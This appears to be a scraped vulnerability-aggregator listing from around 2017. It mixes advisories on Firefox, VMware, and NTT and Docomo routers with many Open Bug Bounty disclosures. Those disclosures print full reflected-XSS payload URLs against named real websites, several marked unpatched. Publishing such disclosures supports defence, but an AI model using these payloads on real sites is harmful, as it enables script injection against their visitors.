gore-workwear.de XSS vulnerability
Vulnerable URL: http://www.gore-workwear.de/searchtof/index?N=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=tof_de_DE&Ntt;=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E Details: Description| Value ---|--- Patched:| Yes,...
6.3AI Score
Mozilla Fixes 32 Vulnerabilities in Firefox 54
Mozilla fixed 32 vulnerabilities, including a critical bug that could have resulted in a crash, with the release Tuesday of Firefox 54, the latest version of its flagship browser. The critical bug, a use-after-free vulnerability, was dug up by longtime bug hunter Nils. The vulnerability...
0.8AI Score
0.007EPSS
VMware Patches Critical Vulnerabilities in vSphere Data Protection
VMware fixed two critical vulnerabilities in its vSphere Data Protection solution this week that could have allowed an attacker to execute commands on the virtual appliance, among other outcomes. The Department of Homeland Security’s CERT encouraged users and admins on Wednesday to apply the...
1.4AI Score
0.005EPSS
6.3AI Score
vSphere Data Protection (VDP) updates address multiple security issues.
a. VDP Java deserialization issue VDP contains a deserialization issue. Exploitation of this issue may allow a remote attacker to execute commands on the appliance. VMware would like to thank Tim Roberts, Arthur Chilipweli, and Kelly Correll from NTT Security for reporting this issue to us. The...
9.8CVSS
3.4AI Score
0.054EPSS
6.9AI Score
Cross-site request forgery (CSRF) vulnerability in L-04D firmware version V10a and V10b allows remote attackers to hijack the authentication of administrators to perform arbitrary operations via unspecified...
8.8CVSS
8.9AI Score
0.002EPSS
investmentreview.com XSS vulnerability
Open Bug Bounty ID: OBB-238668 Description| Value ---|--- Affected Website:| investmentreview.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
search.library.duke.edu XSS vulnerability
Vulnerable URL: http://search.library.duke.edu/search?N=0&Nty;=1&Ntk;=Subject&Ntt;=1%22%2F%3E%3CsvG%2FonLoad%3Dalert%28/OPENBUGBOUNTY/%29%3E&sugg;= Details: Description| Value ---|--- Patched:| No Latest check for patch:| 10.08.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
salliemae.com XSS vulnerability
Open Bug Bounty ID: OBB-237064 Description| Value ---|--- Affected Website:| salliemae.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
mountaingear.us XSS vulnerability
Vulnerable URL: http://www.mountaingear.us/webstore/home.htm?Ntt=89%22%27%2D%2D%21%3E%3CImage%0CSrcset%3DK%0COnerror%3Dconfirm%60OPENBUGBOUNTY%60%0C# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
Vulnerable URL: http://www.sgs.com.tr/tr-TR/SearchResults.aspx?N=4294967075&Ntk;=SI_TR-TR_Turkey&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...
6.3AI Score
Vulnerable URL: http://www.sgs.co.uk/en-GB/SearchResults.aspx?N=4294967073&Ntk;=SI_EN-GB_UK&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...
6.3AI Score
Vulnerable URL: http://www.sgs.vn/en/SearchResults.aspx?N=4294967071&Ntk;=SI_EN-US_Vietnam&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2661572 VIP website status:|...
6.3AI Score
sgsgroup.com.ua XSS vulnerability
Vulnerable URL: http://www.sgsgroup.com.ua/ru-RU/SearchResults.aspx?N=4294967074&Ntk;=SI_RU-RU_Ukraine&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed ...
6.3AI Score
sgsgroup.us.com XSS vulnerability
Vulnerable URL: http://www.sgsgroup.us.com/en/SearchResults.aspx?N=4294967072&Ntk;=SI_EN-US_USA&Ntt;=%22%27%2D%2D%21> ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1174067 VIP website...
6.3AI Score
jcpenney.com.edgekey.net XSS vulnerability
Vulnerable URL: http://www.jcpenney.com.edgekey.net/s/648?Ntt=648%22--!%3E%3CSvg/Onload=confirm('OPENBUGBOUNTY')%3E%22# Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not.....
6.3AI Score
us.riverisland.com XSS vulnerability
Vulnerable URL: http://us.riverisland.com/search?Ntt="'--!>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirmOPENBUGBOUNTY,b")}} Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...
6.3AI Score
5.9CVSS
5.7AI Score
0.002EPSS
7.5CVSS
7.3AI Score
0.001EPSS
6.9AI Score
SA142 : Invalid TCP Packet Generation DoS in SSL Visibility
SUMMARY The SSL Visibility appliance may, under certain circumstances, generate invalid TCP reset (RST) packets to remote SSL servers when terminating an intercepted SSL connection. Some SSL servers may ignore the invalid RST packet received and keep the TCP connection open. A malicious SSL...
5.9CVSS
1.4AI Score
0.003EPSS
Vulnerable URL: http://www.brady.de/de-DE/products/productsearch?startingCategory=0&Ntt;=%3E%27%3E%22%3Etr%3Ci%3Etr%3Cscript%20src=https://openbugbounty.org/1.js%3E Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 19:15 GMT Vulnerability type:|...
6.3AI Score
hi-online.co.za XSS vulnerability
Vulnerable URL: http://www.hi-online.co.za/noResults?Ntt=%3E%27%3E%22%3Ep%3Cimg+src%3Dy+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 31.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...
6.3AI Score
duesouthescapes.co.za XSS vulnerability
Open Bug Bounty ID: OBB-218986 Description| Value ---|--- Affected Website:| duesouthescapes.co.za Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
witt-international.co.uk XSS vulnerability
Vulnerable URL: http://www.witt-international.co.uk/search/_/N-1c?searchType=FullText&Nty;=1&Ntt;=%27%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...
6.3AI Score
michaelkors.co.uk XSS vulnerability
Vulnerable URL: http://www.michaelkors.co.uk/search/_/N-6f9dqlZzcktlt/Ntt-jeans%22%7D%7D%7D%7D%3C//scriptalert/%22%3E%3Cy%20onafterscriptexecute=%22confirm%60OPENBUGBOUNTY%60%22%3E%3C/script%3Exss%3Cy//a/|//=%20%20confirm.; Details: Description| Value ---|--- Patched:| Yes, at Vulnerability...
6.3AI Score
vivara.com.br XSS vulnerability
Vulnerable URL: http://www.vivara.com.br/busca?Ntt='-alert('OPENBUGBOUNTY')-' Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 55106 VIP website status:| No Check vivara.com.br SSL...
6.3AI Score
clasohlson.com XSS vulnerability
Vulnerable URL: http://www.clasohlson.com/se/view/content/search?userSelection=B2B&rememberCookie;=true&N;=0&Ntk;=All&Ntt;=" autofocus onfocus%3dalert%26lpar;"OPENBUGBOUNTY"%26rpar; style%3d"position:fixed;left:0;top:0;display:block;width:100%25;height:100%25;"...
6.2AI Score
guiacores.com XSS vulnerability
Open Bug Bounty ID: OBB-201103 Description| Value ---|--- Affected Website:| guiacores.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
us.topman.com XSS vulnerability
Vulnerable URL: http://us.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13051&catalogId;=33059&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29+%3C%2Fsrc%3E&x;=0&y;=0&geoip;=noredirect Details:...
6.3AI Score
dorothyperkins.com XSS vulnerability
Vulnerable URL: http://www.dorothyperkins.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=12552&catalogId;=33053&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=%21%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details:...
6.3AI Score
eu.topman.com XSS vulnerability
Vulnerable URL: http://eu.topman.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13061&catalogId;=34064&Dy;=1&Nty;=1&beginIndex;=1&pageNum;=1&Ntt;=!%22%3E%3Cvideo%2Fonloadstart%3Dconfirm%28%22OPENBUGBOUNTY%22%29+%3C%2Fsrc%3E&x;=0&y;=0 Details: Description| Value...
6.3AI Score
Code Reuse a Peril for Secure Software Development
The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It’s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off...
-0.4AI Score
0.975EPSS
johnlewis.com XSS vulnerability
Open Bug Bounty ID: OBB-197956 Description| Value ---|--- Affected Website:| johnlewis.com Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] Remediation Guide:| OWASP XSS Prevention Cheat.....
6.4AI Score
zattini.com.br XSS vulnerability
Vulnerable URL: http://www.zattini.com.br/cabelos?Ntt=">// Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 12021 VIP website status:| Yes Check zattini.com.br SSL connection:| (Grade: A) Coordinated Disclosure.....
6.3AI Score
torontopubliclibrary.ca XSS vulnerability
Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%22%3E%3Csvg%2Fonload%3Dalert%28%2FOPENBUGBOUNTY%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 22402 VIP.....
6.3AI Score
gore-tex.com XSS vulnerability
Vulnerable URL: http://www.gore-tex.com/searchgoretex/index?Ntt=te%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3Est&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=en_us Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 12:55...
6.3AI Score
torontopubliclibrary.ca XSS vulnerability
Vulnerable URL: http://www.torontopubliclibrary.ca/search.jsp?Ntt=%27;alert(0)//%27;alert(1)//%22;alert(2)//%22;alert+(3)//--%3E%3C/SCRIPT%3E%22%3E%27+%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6+);function+xss(){// Details: Description| Value ---|--- Patched:| No Latest check...
6.3AI Score
Vulnerable URL: http://www.wehkamp.nl/Zoeken/ArtikelDetail.aspx?ArtikelNummer=743260&Ntt;=panamaΠ=0&PrI;=8&Nrpp;=96&Blocks;=0&View;=Grid"onmouseover="alert('OPENBUGBOUNTY')" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS...
6.3AI Score
Vulnerable URL: http://www.gore-tex.fr/searchgoretex/index?Ntt=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&N;=0&Ntx;=mode%2Bmatchallpartial&Ntk;=All&Nty;=1&locale;=fr_fr Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017...
6.3AI Score
JVN#46351856: Docomo L-04D mobile WiFi router vulnerable to cross-site request forgery
L-04D provided by NTT DOCOMO, INC. is a wireless WiFi router. L-04D contains a cross-site request forgery vulnerability in the web management screen. ## Impact If a user views a malicious page while logged-in, unintended operations may be conducted. ## Solution Update the firmware Update the...
8.8CVSS
2.5AI Score
0.002EPSS
salliemae.com XSS vulnerability
Vulnerable URL: https://www.salliemae.com/search/?Ntt=%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&Ntk;=all_fields&N;=0 Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 13916 VIP website status:| Yes...
6.3AI Score
6.2AI Score
verabradley.com XSS vulnerability
Vulnerable URL: http://www.verabradley.com/browse/_/?Ntt=test%22%3C/script%3E%3Csvg%20onload=onload=prompt(%22OPENBUGBOUNTY%22)%3E Details: Description| Value ---|--- Patched:| Yes, at 27.07.2017 Latest check for patch:| 27.07.2017 22:40 GMT Vulnerability type:| XSS Vulnerability status:|...
6.3AI Score
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
8.9AI Score
0.001EPSS
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
9AI Score
0.001EPSS
NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...
7.2CVSS
7.1AI Score
0.004EPSS
NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allow remote authenticated users to execute arbitrary OS commands via unspecified...
7.2CVSS
7AI Score
0.004EPSS
Cross-site request forgery (CSRF)
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the...
8.8CVSS
7.8AI Score
0.001EPSS